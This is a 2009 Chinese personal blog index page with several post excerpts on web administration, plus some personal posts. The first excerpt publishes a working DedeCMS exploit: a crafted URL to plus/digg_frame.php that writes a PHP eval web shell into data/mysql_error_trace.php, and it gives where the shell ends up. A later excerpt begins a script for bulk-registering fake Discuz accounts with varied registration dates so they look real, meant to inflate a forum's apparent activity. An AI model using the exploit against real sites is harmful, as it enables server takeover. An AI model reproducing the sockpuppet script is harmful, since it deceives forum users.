gooD GoOd StuDy ANd day Day uP

坊间流传很久了，已经拿站拿的官方补丁都有了，终于有人公布了。

dede的数据库错误日志写文件的，之前是写在data/mysql_error_trace.php中，所以产生了漏洞，只要找个地方报个错，就能写shell了。

dede数据库能报错的地方很多，现在大家用的是plus/digg_frame.php文件。

漏洞exp：

1.访问网址：

http://www.dedecms.com/plus/digg_frame.php?action=good&id=1024e1024&mid=*/eval($_POST[cmd]);?>

2.shell在：http://www.dedecms.com/data/mysql_error_trace.php中。

阅读全文>>

类别：漏洞收集 | 评论(0) | 浏览()

向mysql添加新用户并分配权限

2009-08-20 08:54

　　一.Ubuntu下启动mysql方法：

　　/etc/init.d/sudo mysqld

　　二.用户添加

　　bin>mysql -u root

　　mysql> grant 权限1,权限2,...权限n on 数据库名称.表名称 to 用户名@用户地址 identified by '连接口令';

　　权限1,权限2,...权限n代表select,insert,update,delete,create,drop,index,alter,grant,references,reload,shutdown,process,file等14个权限。

　　当权限1,权限2,...权限n被all privileges或者all代替，表示赋予用户全部权限。

　　当数据库名称.表

阅读全文>>

类别：点滴的积累 | 评论(0) | 浏览()

哥做的不是网站是寂寞

2009-08-19 13:48

五环外管庄人民的鼾声此起彼伏

哥还在古董笔记本前面徘徊

烟屁横飞代码狂舞

哥是这个圈子里的元老

四里八村乡亲们的电脑都是我亲自维护

服务周到还免费

刻录光盘 U盘移动硬

应有尽有贼便宜

其实他们不知道

哥的专业是做网站

哥今天的早餐是煎饼果子

加薄脆多来葱花面酱的那种

开封菜的发疯烧饼哥是不屑吃的

性价比太低!!!

其实，像哥这种夜魅族是很少吃早餐的

按照地球那边的作息时间

阅读全文>>

类别：转载 | 评论(0) | 浏览()

小美女徐小小

2009-08-16 19:01

从小就这样，长大了还得了。父母都舍不得嫁了。

阅读全文>>

类别：默认分类 | 评论(3) | 浏览()

虚拟主机Discuz! URL 静态化

2009-08-06 11:19

　　对于虚拟主机来说，空间是否支持 Rewrite 以及是否支持对站点目录中 .htaccess 的文件解析，只有满足这两条件，URL 静态化功能才会生效。

Apache Web Server（虚拟主机用户）

在开始以下设置之前，请首先咨询您的空间服务商，空间是否支持 Rewrite 以及是否支持对站点目录中.htaccess 的文件解析，否则即便按照下面的方法设置好了，也无法使用。检查论坛所在目录中是否存在 .htaccess 文件，如果不存在，请手工建立此文件。Win32 系统下，无法直接建立 .htaccess 文件，您可以从其他系统中拷贝

阅读全文>>

类别：论坛系列 | 评论(0) | 浏览()

批量注册Discuz马甲用户，提高论坛人气

2009-06-12 23:42

　　网上现成的代码存在不少问题，根本不能用，所以就改了下。在discuz! 6.1.0下测试成功，可以正常登录、发帖。

　　此程序必须预先定义好所有的用户名，没有采用随机组合字符的方法。并且所有用户的注册日期都不一样，以提高真实性。

　　定义用户的文件user.php：

<?php
$username = array(
'user1','netoom','qwer' //省略n多用户
);
?>

　　主文件reg.php：

<?php
require_once './include/common.inc.php';
require_once 'user.php';
$member_nu

阅读全文>>

类别：编程学习 | 评论(1) | 浏览()